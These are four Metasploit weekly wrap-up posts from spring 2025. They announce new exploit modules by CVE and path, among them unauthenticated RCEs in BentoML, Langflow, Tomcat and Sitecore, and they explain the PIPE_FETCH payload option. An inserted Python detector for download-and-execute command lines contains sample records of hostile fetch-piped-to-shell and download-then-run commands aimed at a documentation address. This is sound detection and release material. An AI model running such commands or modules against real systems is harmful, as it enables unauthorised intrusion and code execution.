If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

NEVER MISS AN EMERGING THREAT

Be the first to learn about the latest vulnerabilities and cybersecurity news.

Subscribe Now

Metasploit Wrap-Up 04/18/2025

Smaller Fetch Payloads

This week, a significant enhancement was made to the already awesome fetch payload feature by our very own bwatters-r7. The improvement introduces a new option, PIPE_FETCH, which optimizes the process by serving both the payload and the command to be executed simultaneously.

This enhancement directly addresses the challenge of limited space by significantly reducing the size of the command that needs to be run. The PIPE_FETCH option works by initially generating a small command. When this compact command is executed, it fetches the actual, larger command that needs to be run. The fetched command is then directly piped into the shell, streamlining the execution process and making it feasible to use fetch payloads in scenarios where space constraints were previously a limitation.
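Because PIPE_FETCH reduces the initial command to a fetch whose output is piped straight into a shell, the shape a defender wants to catch in process-creation telemetry is a downloader stage feeding a shell interpreter, with the older write-to-file-then-execute form of a fetch payload as the sibling pattern. The Python below is an added example for this wrap-up, not code from Metasploit or from the post: it splits a command line into pipeline stages with the standard library's shlex and reports three shapes, a download piped into a shell, a download written to a file that the same command line then executes, and a downloader inside command substitution. The downloader and shell name lists are assumptions, and the process records are constructed, not captured.

```python
"""Flag download-and-execute command lines, including 'fetch | shell' pipelines.

Added example for the PIPE_FETCH description above; not Metasploit code. The
process records below are constructed, not captured from a real host.
"""
import re
import shlex

DOWNLOADERS = {"curl", "wget", "fetch", "ftp", "tftp"}   # assumed downloader names
SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh"}      # assumed interpreter names
SEPARATORS = {"|", ";", "&&", "||", "&"}
# Downloader invoked inside $( ... ) or backticks, e.g. sh -c "$(curl ...)"
SUBST_RE = re.compile(r"(?:\$\(|`)\s*(?:%s)\b" % "|".join(sorted(DOWNLOADERS)))


def _base(tok):
    return tok.rsplit("/", 1)[-1]


def tokenize(cmdline):
    """Shell-like tokenization that also splits on unquoted | ; & ( ) < >."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""          # '#' inside URLs must not start a comment
    try:
        return list(lex)
    except ValueError:           # unbalanced quotes: degrade to a plain split
        return cmdline.split()


def stages(tokens):
    """Split tokens into (separator_before, [tokens]) stages of the command line."""
    out, cur, sep = [], [], None
    for t in tokens:
        if t in SEPARATORS:
            if cur:
                out.append((sep, cur))
            cur, sep = [], t
        else:
            cur.append(t)
    if cur:
        out.append((sep, cur))
    return out


def output_path(stage_tokens):
    """Best-effort output file of a downloader stage (-o X, -so X, -O X, --output X, > X)."""
    for i, t in enumerate(stage_tokens[:-1]):
        nxt = stage_tokens[i + 1]
        if t in ("-O", "--output", "--output-document", ">"):
            return nxt
        if t.startswith("-") and not t.startswith("--") and t.endswith("o"):
            return nxt
    return None


def classify(cmdline):
    """Return the list of download-and-execute patterns found in one command line."""
    findings = []
    st = stages(tokenize(cmdline))
    for i, (_, toks) in enumerate(st):
        if _base(toks[0]) not in DOWNLOADERS:
            continue
        # Pattern 1: downloader piped straight into a shell interpreter
        if i + 1 < len(st) and st[i + 1][0] == "|" and _base(st[i + 1][1][0]) in SHELLS:
            findings.append("download-piped-to-shell")
        # Pattern 2: downloaded file executed later in the same command line
        path = output_path(toks)
        if path:
            for _, later in st[i + 1:]:
                if later[0] == path or (_base(later[0]) in SHELLS and path in later[1:]):
                    findings.append("download-then-execute")
                    break
    # Pattern 3: downloader output substituted into a shell command
    if SUBST_RE.search(cmdline):
        findings.append("download-in-command-substitution")
    return findings


# Constructed process-creation records: (pid, command line); RFC 5737 addresses
SAMPLE_RECORDS = [
    ("4101", "curl -fsSL http://192.0.2.50:8080/stage | sh"),
    ("4102", "wget -qO- http://192.0.2.50:8080/stage|bash"),
    ("4103", "curl -so /tmp/.x http://192.0.2.50:8080/bin; chmod +x /tmp/.x; /tmp/.x &"),
    ("4104", 'sh -c "$(curl -s http://192.0.2.50:8080/stage)"'),
    ("4105", "curl -s https://updates.example.com/manifest.json -o /var/tmp/manifest.json"),
    ("4106", "cat /var/log/syslog | grep sshd | wc -l"),
]


def scan(records):
    """(pid, finding) pairs for every record that matches a pattern."""
    return [(pid, f) for pid, cmd in records for f in classify(cmd)]


if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_RECORDS):
        print(pid, finding)
```

The tokenizer is the part that matters: splitting on whitespace alone misses `stage|bash`, and a regex over the raw string misses the file-then-execute form, so each pattern is evaluated over stages rather than over text. Record 4105 shows the expected benign case, a download to a file that the command line never executes.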

New module content (2)

BentoML RCE

Authors: Takahiro Yokoyama and c2an1
Type: Exploit
Pull request: #20041 contributed by Takahiro-Yoko
Path: linux/http/bentoml_rce_cve_2025_27520
AttackerKB reference: CVE-2025-27520

Description: This adds a module for an unauthenticated remote code execution in BentoML (CVE-2025-27520).

Langflow AI RCE

Authors: Naveen Sunkavally (Horizon3.ai) and Takahiro Yokoyama
Type: Exploit
Pull request: #20022 contributed by Takahiro-Yoko
Path: multi/http/langflow_unauth_rce_cve_2025_3248
AttackerKB reference: CVE-2025-3248

Description: This adds a module for CVE-2025-3248, an unauthenticated RCE vulnerability that affects Langflow versions prior to 1.3.0.

Enhancements and features (4)

  • #19982 from jvoisin - Updates the Linux enum_protections module to use proper product names instead of executable names, and adds a file-based detection method.
  • #20031 from bcoles - Adds metadata and improves the code quality of multiple FreeBSD exploit modules.
  • #20032 from bcoles - Improves the code quality of multiple nops modules.
  • #20035 from bcoles - Enhances the code quality of multiple encoder modules.

Bugs fixed (3)

  • #20005 from fabpiaf - Fixes a LoadError when loading sqlite3 modules in Metasploit's Docker support.
  • #20036 from bcoles - Fixes an issue with the exploit/windows/local/unquoted_service_path module that previously claimed a file upload was successful regardless of whether the file upload was successful or not.
  • #20043 from adfoster-r7 - Updates the error handling of the Open WAN-to-LAN proxy on AT&T routers module when an older Python version is detected.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.


Metasploit Weekly Wrap-Up 04/11/2025

11 April 2025 at 14:03

Spring Exploits

This weekly release of Metasploit Framework includes new RCE exploit modules for several vulnerable applications: Appsmith, a low-code application platform with a PostgreSQL misconfiguration (CVE-2024-55964); Pandora FMS, a monitoring solution in which commands can be injected once access to the administrator panel has been gained (CVE-2024-12971); Oracle Access Manager, an SSO application with an unauthenticated deserialization vulnerability (CVE-2021-35587); and the pgAdmin Query Tool, a powerful database management tool that lets an attacker turn database access into a shell (CVE-2025-2945).

New module content (5)

CrushFTP AWS4-HMAC Authentication Bypass

Authors: Outpost24 and remmons-r7
Type: Auxiliary
Pull request: #20000 contributed by remmons-r7
Path: gather/crushftp_authbypass_cve_2025_2825
AttackerKB reference: CVE-2025-2825

Description: Adds an auxiliary module leveraging CVE-2025-2825, an authentication bypass in CrushFTP 11 < 11.3.1 and 10 < 10.8.4, to obtain working session cookies for the target user account.

Appsmith RCE

Authors: Takahiro Yokoyama and Whit Taylor (Rhino Security Labs)
Type: Exploit
Pull request: #20007 contributed by Takahiro-Yoko
Path: linux/http/appsmith_rce_cve_2024_55964
AttackerKB reference: CVE-2024-55964

Description: This module adds an exploit for CVE-2024-55964, a misconfigured PostgreSQL instance in Appsmith, which can lead to remote code execution (RCE).

Pandora FMS authenticated command injection leading to RCE via chromium_path or phantomjs_bin

Author: h00die-gr3y (https://github.com/h00die-gr3y)
Type: Exploit
Pull request: #20008 contributed by h00die-gr3y
Path: linux/http/pandora_fms_auth_rce_cve_2024_12971
AttackerKB reference: CVE-2024-12971

Description: Adds a module for CVE-2024-12971, a command injection in the directory settings of Pandora FMS. The module requires admin credentials, but if MySQL is exposed with default credentials, the module creates a new admin profile.

Oracle Access Manager unauthenticated Remote Code Execution

Authors: Jang, Peterjson, Y4er, and sfewer-r7
Type: Exploit
Pull request: #19994 contributed by sfewer-r7
Path: multi/http/oracle_access_manager_rce_cve_2021_35587
AttackerKB reference: CVE-2021-35587

Description: This adds an exploit module for CVE-2021-35587, an unauthenticated deserialization vulnerability affecting Oracle Access Manager (OAM).

pgAdmin Query Tool authenticated RCE (CVE-2025-2945)

Authors: jheysel-r7 and pyozzi-toss
Type: Exploit
Pull request: #20018 contributed by jheysel-r7
Path: multi/http/pgadmin_query_tool_authenticated
AttackerKB reference: CVE-2025-2945

Description: A new module for CVE-2025-2945, authenticated remote code execution in pgAdmin. The vulnerability lies within the Query Tool. For successful exploitation, an attacker needs a set of valid credentials for pgAdmin and credentials for the target database.

Enhancements and features (5)

  • #20003 from zeroSteiner - Adds support for the LDAP protocol within RHOSTS, for example: use auxiliary/gather/ldap_query and run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local action=ENUM_ACCOUNTS.
  • #20006 from cgranleese-r7 - Adds additional metadata to the phpbb_highlight and ms10_061_spoolss modules.
  • #20015 from adfoster-r7 - Metasploit will now no longer attempt to load external modules with unsupported runtimes as it caused crashes to occur. Now users are notified if they are required to install Go or Python3.
  • #20019 from adfoster-r7 - Improves metadata and enhances the APIs for extracting HTTP compatible login scanners.
  • #20024 from cgranleese-r7 - Adds a new sslkeylogfile datastore option to HTTP modules to support decrypting SSL/TLS network traffic.

Bugs fixed (1)

  • #20013 from sjanusz-r7 - Fixes a crash when using the module search cache with an integer.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.


Metasploit Wrap-Up 04/04/2025

4 April 2025 at 16:19

New RCEs

Metasploit added four new modules this week, including three that leverage vulnerabilities to obtain remote code execution (RCE). Among these three, two leverage deserialization, showing that the exploit primitive is still going strong. The Tomcat vulnerability in particular CVE-2025-24813 garnered a lot of attention when it was disclosed; however, to function, the exploit requires specific conditions to be met, which may not be present in many environments.

AD CS / PKCS12 Improvements

With the popularity of exploiting AD CS misconfigurations over the past couple of years, Metasploit has continued to iterate on its support. This week saw two improvements. The first adds additional error handling, which notably calls out authorization errors more clearly to the user. These errors, now labeled no-access failures, are encountered when the user is successfully authenticated but lacks the authorization to enroll on either the certificate template or the certificate authority server. The second continues the work on Metasploit's PKCS12 certificate storage: a milestone was reached allowing additional metadata to be stored with the certificate, which in the future will enable more streamlined use of stored certificate data. This new metadata includes the password to decrypt the PKCS12 data, the CA that issued the certificate, and the AD CS template it was derived from.

New module content (4)

pfSense Login Scanner

Author: sjanusz-r7
Type: Auxiliary
Pull request: #19985 contributed by sjanusz-r7
Path: scanner/http/pfsense_login

Description: This adds a login scanner module for pfSense which can be used to brute force valid credentials to the web GUI.

CmsMadeSimple Authenticated File Manager RCE

Authors: Mirabbas Ağalarov, Okan Kurtuluş, and tastyrice
Type: Exploit
Pull request: #19980 contributed by tastyrce
Path: multi/http/cmsms_file_manager_auth_rce
AttackerKB reference: CVE-2023-36969

Description: This adds an exploit module for CMSMadeSimple <= v2.2.21, which is vulnerable to an authenticated RCE (CVE-2023-36969).

Tomcat Partial PUT Java Deserialization

Authors: Calum Hutton, h4ck3r-04, and sw0rd1ight
Type: Exploit
Pull request: #19995 contributed by chutton-r7
Path: multi/http/tomcat_partial_put_deserialization
AttackerKB reference: CVE-2025-24813

Description: This adds an exploit module for CVE-2025-24813, which is an unauthenticated, constrained file write vulnerability in Apache Tomcat.

Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit

Authors: Dylan Pindur and machang-r7
Type: Exploit
Pull request: #19947 contributed by machang-r7
Path: windows/http/sitecore_xp_cve_2025_27218
AttackerKB reference: CVE-2025-27218

Description: This adds an exploit module for CVE-2025-27218, an unauthenticated .NET deserialization vulnerability in Sitecore.

Enhancements and features (4)

  • #19606 from cgranleese-r7 - This updates the LDAP modules to use datastore options for authentication that are prefixed with LDAP, allowing them to be used as larger workflows that merge datastore options for multiple protocols.
  • #19736 from cdelafuente-r7 - This update adds support for the new Pkcs12 data format, allowing the CA and ADCS template to be stored as metadata in the database. Additionally, Pkcs12 passwords can now be stored as metadata, with validation ensuring correct passwords are provided when adding encrypted Pkcs12 files using the creds command.
  • #19984 from zeroSteiner - This improves AD CS workflows by adding additional error handling.
  • #19991 from zeroSteiner - This adds some new tests for LoginScanners. It ensures that the LoginScanners follow a common interface for initialization, most notably that they take a single argument containing the configuration as a hash.

Bugs fixed (3)

  • #19934 from sfewer-r7 - This addresses several bugs in the exploit/linux/misc/cisco_ios_xe_rce module, which was failing for Cisco IOS XE version 17.06.05 on C8000v series appliances. Fixes include correcting the /webui URI to /webui/ (with a trailing slash) and adjusting the case sensitivity in the /webui_wsma_https URI for both CSR1000v and C8000v appliances. Additionally, the module now properly distinguishes between HTTPS and HTTP targets, ensuring compatibility with both appliance series.
  • #19993 from h00die-gr3y - This fixes an issue where payloads using the cmd/base64 encoder with the badchar \x20 (space) failed due to syntax errors in POSIX shells when ${IFS} followed parentheses. Unnecessary spaces were removed from the payload to ensure proper execution in Unix-based environments.
  • #19998 from sjanusz-r7 - Fixes a crash when running the auxiliary/crawler/msfcrawler module.

Documentation

  • #19979 from bwatters-r7 - This adds documentation that describes when a module submission may be superseded.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.


Metasploit Wrap-Up 03/28/2025

28 March 2025 at 15:44

Windows LPE - Cloud File Mini Filer Driver Heap Overflow

This Metasploit release includes an exploit module for CVE-2024-30085, an LPE in cldflt.sys which is known as the Windows Cloud Files Mini Filer Driver. This driver allows users to manage and sync files between a remote server and a local client. The exploit module allows users with an existing session on an affected Windows device to seamlessly escalate their privileges to NT AUTHORITY\SYSTEM. This module has been tested on Windows workstation versions 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.

New module content (3)

GLPI Inventory Plugin Unauthenticated Blind Boolean SQLi

Authors: jheysel-r7 and rz
Type: Auxiliary
Pull request: #19974 contributed by jheysel-r7
Path: gather/glpi_inventory_plugin_unauth_sqli
AttackerKB reference: CVE-2025-24799

Description: This adds an auxiliary module for an unauthenticated boolean-based blind SQL injection vulnerability (CVE-2025-24799) in GLPI <= 1.0.18 when the Inventory Plugin is installed and enabled.

Eramba (up to 3.19.1) Authenticated Remote Code Execution Module

Authors: Niklas Rubel, Sergey Makarov, Stefan Pietsch, Trovent Security GmbH, and msutovsky-r7
Type: Exploit
Pull request: #19957 contributed by msutovsky-r7
Path: linux/http/eramba_rce
AttackerKB reference: CVE-2023-36255

Description: This adds an exploit for CVE-2023-36255 which is an authenticated command injection vulnerability in Eramba.

Windows Cloud File Mini Filer Driver Heap Overflow

Authors: Alex Birnberg, bwatters-r7, and ssd-disclosure
Type: Exploit
Pull request: #19802 contributed by bwatters-r7
Path: windows/local/cve_2024_30085_cloud_files
AttackerKB reference: CVE-2024-30085

Description: Local Privilege Escalation for Windows, exploiting CVE-2024-30085. It allows escalating an existing session to higher privileges.

Bugs fixed (3)

  • #19932 from adfoster-r7 - Fixes a crash when running the exploits/windows/mssql/mssql_payload module against previously opened Microsoft SQL Server sessions.
  • #19962 from e2002e - This preemptively updates the API host for the ZoomEye search module to reflect changes made by the upstream organization.
  • #19987 from zeroSteiner - This updates the Ivanti and Sonicwall Bruteforce modules to use #initialize methods that accept a single argument as the LoginScanner classes should. It also renames the modules to follow the standard convention and adds a small fix to catch an unhandled connection error that was being thrown by the Sonicwall module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.
